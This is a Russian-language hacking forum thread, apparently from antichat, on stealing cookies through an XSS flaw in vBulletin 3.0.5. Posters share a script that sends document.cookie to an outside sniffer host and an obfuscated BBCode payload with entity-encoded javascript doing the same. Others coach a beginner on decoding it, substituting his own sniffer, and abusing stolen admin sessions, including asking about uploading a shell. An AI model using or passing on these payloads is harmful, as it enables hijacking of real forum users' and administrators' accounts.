|
XSS на Bulletin Version 3.0.5
Скажите пожалуста как код снифера встовлять в тему......
Вот например код Код:
<script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script>Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю ! |
В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?
|
Powered by: vBulletin Version 3.0.5
Помогите плиз |
Код HTML:
[URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/FONT][/url][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ][/FONT][/URL] |
***************************
PHP код:
Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS |
Ну все, вставляй и иди на лог античата. ток вроде плюсы не везде убрал
|
Цитата:
Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто :, понятно??? Я не знаю, как ещё проще объяснить.... Не забываем про репутацию |
а куда конкретно его вставлять в свой пост? и канает ли данная XSS в vBulletin v3.5.2 ?
|
Extrim Ты не все плюсы убрал!!! Со зрением чтоли плохо? Со второй попытки и то не все=)))
Цитата:
|
А у кого нить есть этот декодер,чтобы так же делать из букв в такие коды?
|
cardons А причем тут тема XSS на Bulletin 3.5.0??? НЕ флейми!=)
зы qBiN уже отвечал на ЭТОТ твой вопрос в другой теме. |
Вот посмотри теперь правильно ?
|
??
Вроде везде пдюсы поубирал ? |
перед document.cookie + поставь
|
а как на свай снифер код зделать /
http://s.netsec.ru/ |
Вместо ссылки на ачатовский сниффер впиши ссылку к твоему. Вида _http://s.netsec.ru//s.gif?id=[ID]&
зы и всё-таки ещё не все плюсы ты убрал-) |
Воще где то было в нете но я просрал страницу. Потом нашёл прогу URICrypt классная штука ищи в нете если что.
|
Цитата:
|
Стырил куки с Bulletin 3.0.7
А в админку попасть не могу! Пишет типа введите логин и пароль... Как добыть то это мокрое дело? |
milord69, в булке же соль. Не расшифруешь ты. никак, имхо.
|
Ок, а что тогда можно под правами админа сделать? Кроме того чтобы удалить все темы. Мож можна как-то шел залить, если под адмиком залогиниться?
|
Цитата:
|
блин вот западло и что тогда делать?
|
Цитата:
|
Слушайте короче на video.antichat.ru появился видеоролик по xss в vBulletin.Там создатель в сообщение вставляет код который начинается так [r0x].Вот млжете выложить здесь этот код у кого есть.И скажите пожалуйста логин и пароль эта xss будет высылать на e-mail на котором зарегистрирован мой аккаунт,или надо в код уязвимости вставлять мыло куда бы высылался бы логин и пароль???
|
| Время: 01:41 |